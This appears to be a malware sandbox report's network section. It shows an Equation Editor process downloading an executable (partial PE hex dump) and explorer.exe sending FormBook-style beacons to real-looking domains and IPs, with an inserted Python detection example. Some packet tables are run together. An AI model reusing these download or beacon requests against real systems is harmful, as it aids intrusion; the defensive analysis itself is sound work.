Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
11/26/20-09:01:24.634313 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49168 | 34.102.136.180 | 192.168.2.22

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 26, 2020 09:00:23.357465029 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
Nov 26, 2020 09:00:23.581357002 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
Nov 26, 2020 09:00:23.581557035 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
Nov 26, 2020 09:00:23.581810951 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
Nov 26, 2020 09:00:23.805932999 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
Nov 26, 2020 09:00:23.806014061 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
Nov 26, 2020 09:00:23.806057930 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
Nov 26, 2020 09:00:23.806096077 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
Nov 26, 2020 09:00:23.806238890 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
Nov 26, 2020 09:00:23.806289911 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
Nov 26, 2020 09:00:24.028904915 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
Nov 26, 2020 09:00:24.028935909 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
Nov 26, 2020 09:00:24.028947115 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
Nov 26, 2020 09:00:24.028958082 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
Nov 26, 2020 09:00:24.028969049 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
Nov 26, 2020 09:00:24.028980017 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
Nov 26, 2020 09:00:24.028990984 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
Nov 26, 2020 09:00:24.029001951 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
Nov 26, 2020 09:00:24.029870987 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
Nov 26, 2020 09:00:24.252491951 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
Nov 26, 2020 09:00:24.252542019 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
Nov 26, 2020 09:00:24.252557039 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.252572060 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.252585888 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.252599955 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.252614021 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.252638102 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.252652884 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.252672911 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.252692938 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.252715111 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.252813101 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.252854109 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.257903099 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.475923061 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.475954056 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.475975037 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.475996017 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.476015091 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.476033926 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.476052999 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.476078033 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.476099968 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.476119995 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.476135015 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.476150036 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.476170063 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.476274967 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.476324081 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.476330996 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.477031946 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.477054119 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.477075100 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.477093935 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.477116108 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.477124929 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.477135897 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.477143049 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.477169037 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.477215052 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.480289936 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.698900938 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.698960066 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.698998928 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.699037075 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.699074984 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.699120998 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.699167967 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.699207067 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.699219942 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.699245930 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.699254990 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.699260950 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.699265003 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.699285984 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.699299097 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.699323893 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.699353933 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.699362993 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.699368000 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.699400902 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.699424028 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.699450016 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.699461937 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.699492931 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.699512959 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.699531078 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.699543953 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.699568987 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.699588060 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.699606895 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.699620962 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.699644089 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.699666977 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.699687004 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.699709892 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.699718952 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.699724913 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.699771881 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.699788094 CET4916780192.168.2.22103.141.138.87

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 26, 2020 09:00:23.305349112 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Nov 26, 2020 09:00:23.341093063 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Nov 26, 2020 09:01:24.294477940 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8
Nov 26, 2020 09:01:24.484945059 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22
Nov 26, 2020 09:01:44.808792114 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Nov 26, 2020 09:01:44.848503113 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22
Nov 26, 2020 09:02:05.723607063 CET | 61200 | 53 | 192.168.2.22 | 8.8.8.8
Nov 26, 2020 09:02:06.065185070 CET | 53 | 61200 | 8.8.8.8 | 192.168.2.22

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Nov 26, 2020 09:00:23.305349112 CET | 192.168.2.22 | 8.8.8.8 | 0x7ddb | Standard query (0) | wsdyneverwalkachinese2loneinlifekwsfnv.ydns.eu | A (IP address) | IN (0x0001)
Nov 26, 2020 09:01:24.294477940 CET | 192.168.2.22 | 8.8.8.8 | 0xa14d | Standard query (0) | www.lygosfilms.info | A (IP address) | IN (0x0001)
Nov 26, 2020 09:01:44.808792114 CET | 192.168.2.22 | 8.8.8.8 | 0x2e78 | Standard query (0) | www.paletciniz.com | A (IP address) | IN (0x0001)
Nov 26, 2020 09:02:05.723607063 CET | 192.168.2.22 | 8.8.8.8 | 0x2f03 | Standard query (0) | www.annaothomas.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Nov 26, 2020 09:00:23.341093063 CET | 8.8.8.8 | 192.168.2.22 | 0x7ddb | No error (0) | wsdyneverwalkachinese2loneinlifekwsfnv.ydns.eu | - | 103.141.138.87 | A (IP address) | IN (0x0001)
Nov 26, 2020 09:01:24.484945059 CET | 8.8.8.8 | 192.168.2.22 | 0xa14d | No error (0) | www.lygosfilms.info | lygosfilms.info | - | CNAME (Canonical name) | IN (0x0001)
Nov 26, 2020 09:01:24.484945059 CET | 8.8.8.8 | 192.168.2.22 | 0xa14d | No error (0) | lygosfilms.info | - | 34.102.136.180 | A (IP address) | IN (0x0001)
Nov 26, 2020 09:01:44.848503113 CET | 8.8.8.8 | 192.168.2.22 | 0x2e78 | No error (0) | www.paletciniz.com | paletciniz.com | - | CNAME (Canonical name) | IN (0x0001)
Nov 26, 2020 09:01:44.848503113 CET | 8.8.8.8 | 192.168.2.22 | 0x2e78 | No error (0) | paletciniz.com | - | 160.153.138.53 | A (IP address) | IN (0x0001)
Nov 26, 2020 09:02:06.065185070 CET | 8.8.8.8 | 192.168.2.22 | 0x2f03 | No error (0) | www.annaothomas.com | - | 104.164.99.242 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• wsdyneverwalkachinese2loneinlifekwsfnv.ydns.eu
• www.lygosfilms.info
• www.paletciniz.com
• www.annaothomas.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49167 | 103.141.138.87 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp | kBytes transferred | Direction | Data
Nov 26, 2020 09:00:23.581810951 CET | 0 | OUT | GET /chnsfrnd2/winlog.exe HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: wsdyneverwalkachinese2loneinlifekwsfnv.ydns.eu
    Connection: Keep-Alive
Nov 26, 2020 09:00:23.805932999 CET | 2 | IN | HTTP/1.1 200 OK
    Date: Thu, 26 Nov 2020 08:00:28 GMT
    Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
    Last-Modified: Wed, 25 Nov 2020 21:20:21 GMT
    ETag: "61800-5b4f4feb1ea84"
    Accept-Ranges: bytes
    Content-Length: 399360
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: application/x-msdownload
                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ea aa c2 b4 ae cb ac e7 ae cb ac e7 ae cb ac e7 b0 99 28 e7 b4 cb ac e7 b0 99 39 e7 be cb ac e7 89 0d d7 e7 bf cb ac e7 ae cb ad e7 d8 cb ac e7 b0 99 2f e7 e7 cb ac e7 b0 99 38 e7 af cb ac e7 b0 99 3d e7 af cb ac e7 52 69 63 68 ae cb ac e7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 89 ca be 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 2a 01 00 00 f6 04 00 00 00 00 00 97 35 00 00 00 10 00 00 00 40 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 06 00 00 04 00 00 00 00 00 00 03 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 14 61 01 00 b4 00 00 00 00 a0 04 00 a8 89 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 06 00 d0 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 5c 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 f8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 29 01 00 00 10 00 00 00 2a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 bc 2b 00 00 00 40 01 00 00 2c 00 00 00 2e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 28 03 00 00 70 01 00 00 1e 03 00 00 5a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 89 01 00 00 a0 04 00 00 8a 
01 00 00 78 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c2 14 00 00 00 30 06 00 00 16 00 00 00 02 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$(9/8=RichPEL_*5@@P@a0X\@@.text)* `.rdata+@,.@@.data`(pZ@.rsrcx@@.reloc0@B


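The two HTTP sessions in this table are the report's most actionable network facts: in session 0 the Equation Editor process (EQNEDT32.EXE, the CVE-2017-11882 target named in the signatures) fetches winlog.exe, served as application/x-msdownload with an MZ header; in the session that follows, the injected explorer.exe sends a FormBook-style check-in, a GET to a short directory with two opaque query parameters, "Connection: close" and a 7-byte all-NUL body, and is answered with a 403. The code below is an added example, not part of the Joe Sandbox report or of any vendor signature: it builds session records from request and response text in the shape the report prints, then applies two checks, one for an Office-side process doing HTTP at all (and, worse, receiving a PE), and one for the explorer.exe beacon shape. The process list, the content-type list and the query-string regular expression are assumptions derived from the rows above; the three records are constructed to mirror this report plus one benign control.

```python
"""Added example (not from the Joe Sandbox report): two detections for the HTTP
behaviour recorded in this analysis, run over constructed session records."""
import re
from dataclasses import dataclass, field

# Assumption: Office-side binaries that should never pull executables over HTTP.
OFFICE_PROCS = {"eqnedt32.exe", "excel.exe", "winword.exe", "powerpnt.exe"}
# Content types that announce a Windows executable (session 0 used the first one).
PE_MIME = {"application/x-msdownload", "application/x-dosexec"}
# Assumption: check-in shape seen in session 1, /<short dir>/?<key>=<long blob>&<key>=<token>
BEACON_PATH = re.compile(
    r"^/[A-Za-z0-9]{2,8}/\?[A-Za-z0-9_]+=[A-Za-z0-9+/=_-]{20,}&[A-Za-z0-9_]+=[A-Za-z0-9_-]+$")


@dataclass
class HttpSession:
    process: str          # image path of the process that owned the socket (sandbox/EDR attribution)
    method: str
    path: str
    req_headers: dict
    req_body: bytes = b""
    resp_headers: dict = field(default_factory=dict)
    resp_body: bytes = b""


def parse_raw(process, raw_req, raw_resp="", resp_body=b"", req_body=b""):
    """Build a session from request/response text laid out as the report prints it."""
    req_line, *req_hdr = raw_req.strip().splitlines()
    method, path, _ = req_line.split(" ", 2)
    resp_hdr = raw_resp.strip().splitlines()[1:] if raw_resp.strip() else []

    def hdrs(lines):
        # Header names are case-insensitive; normalise to lower case for lookups.
        return {k.strip().lower(): v.strip()
                for k, v in (l.split(":", 1) for l in lines if ":" in l)}

    return HttpSession(process, method, path, hdrs(req_hdr), req_body, hdrs(resp_hdr), resp_body)


def detect(s):
    """Return the list of rule names the session triggers (empty list when clean)."""
    hits = []
    proc = s.process.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    ctype = s.resp_headers.get("content-type", "").split(";")[0].strip().lower()
    # Trust the body over the header: a PE starts with "MZ" whatever the server claims.
    is_pe = s.resp_body.startswith(b"MZ") or ctype in PE_MIME
    if proc in OFFICE_PROCS:
        hits.append("office_process_http")          # EQNEDT32.EXE should never speak HTTP
        if is_pe:
            hits.append("office_process_pe_download")
    if (proc == "explorer.exe" and s.method == "GET" and BEACON_PATH.match(s.path)
            and s.req_headers.get("connection", "").lower() == "close"
            and s.req_body and not s.req_body.strip(b"\x00")):
        hits.append("formbook_style_beacon")        # shell process, not a browser, sending a NUL body
    return hits


# Constructed records mirroring the two sessions in this report, plus a benign control.
SESSION0 = parse_raw(
    r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
    "GET /chnsfrnd2/winlog.exe HTTP/1.1\nHost: wsdyneverwalkachinese2loneinlifekwsfnv.ydns.eu\nConnection: Keep-Alive",
    "HTTP/1.1 200 OK\nContent-Type: application/x-msdownload\nContent-Length: 399360",
    resp_body=b"MZ\x90\x00\x03\x00\x00\x00",
)
SESSION1 = parse_raw(
    r"C:\Windows\explorer.exe",
    "GET /ogg/?Xrx4lx8=o9DTWGgejQhFb0XDNKFr8x252gLWlqtFw+u/IiN1z9p9QWzZEqjsrtg5rynyb3VCEFeW0g==&eny8V=8p-t_j0xRnOLT2 HTTP/1.1\n"
    "Host: www.lygosfilms.info\nConnection: close",
    "HTTP/1.1 403 Forbidden\nContent-Type: text/html",
    req_body=b"\x00" * 7,
)
BENIGN = parse_raw(r"C:\Windows\explorer.exe",
                   "GET /index.html HTTP/1.1\nHost: example.test\nConnection: keep-alive")

if __name__ == "__main__":
    for name, s in (("session0", SESSION0), ("session1", SESSION1), ("benign", BENIGN)):
        print(name, detect(s))
```

The first rule needs process attribution, which a sandbox or EDR has and a passive network tap does not; on a tap only the PE download (content type or MZ magic) and the beacon path shape remain, and the path shape alone is noisier. The 403 in session 1 is not a reason to clear the host: the DNS table above shows the sample querying the next domain about 20 seconds later, so the response code plays no part in the rule.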
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49168 | 34.102.136.180 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Nov 26, 2020 09:01:24.518790007 CET | 419 | OUT | GET /ogg/?Xrx4lx8=o9DTWGgejQhFb0XDNKFr8x252gLWlqtFw+u/IiN1z9p9QWzZEqjsrtg5rynyb3VCEFeW0g==&eny8V=8p-t_j0xRnOLT2 HTTP/1.1
    Host: www.lygosfilms.info
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Nov 26, 2020 09:01:24.634313107 CET | 420 | IN | HTTP/1.1 403 Forbidden
    Server: openresty
    Date: Thu, 26 Nov 2020 08:01:24 GMT
    Content-Type: text/html
    Content-Length: 275
    ETag: "5fb7c9ca-113"
    Via: 1.1 google
    Connection: close
                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49169 | 160.153.138.53 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Nov 26, 2020 09:01:44.896217108 CET | 420 | OUT | GET /ogg/?Xrx4lx8=eztizZ8x7kSo9uOf28HhjptTcxlOOjaZfVOeHHhHD52pMpUKEpnrJtnkFIsv9WMMSpfKiA==&eny8V=8p-t_j0xRnOLT2 HTTP/1.1
Host: www.paletciniz.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 26, 2020 09:01:45.518532038 CET | 422 | IN | HTTP/1.1 404 Not Found
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES:Forced
Transfer-Encoding: chunked
Date: Thu, 26 Nov 2020 08:01:45 GMT
Age: 0
Connection: close
Vary: User-Agent
X-Cache: uncached
X-Cache-Hit: MISS
X-Backend: all_requests
                                                                                                                                      Data Raw: 30 30 37 65 38 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 53 61 79 66 61 20 62 75 6c 75 6e 61 6d 61 64 c4 b1 20 26 23 38 32 31 31 3b 20 50 61 6c 65 74 63 69 6e 69 7a 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 50 61 6c 65 74 63 69 6e 69 7a 2e 63 6f 6d 20 26 72 61 71 75 6f 3b 20 62 65 73 6c 65 6d 65 73 69 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 61 6c 65 74 63 69 6e 69 7a 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 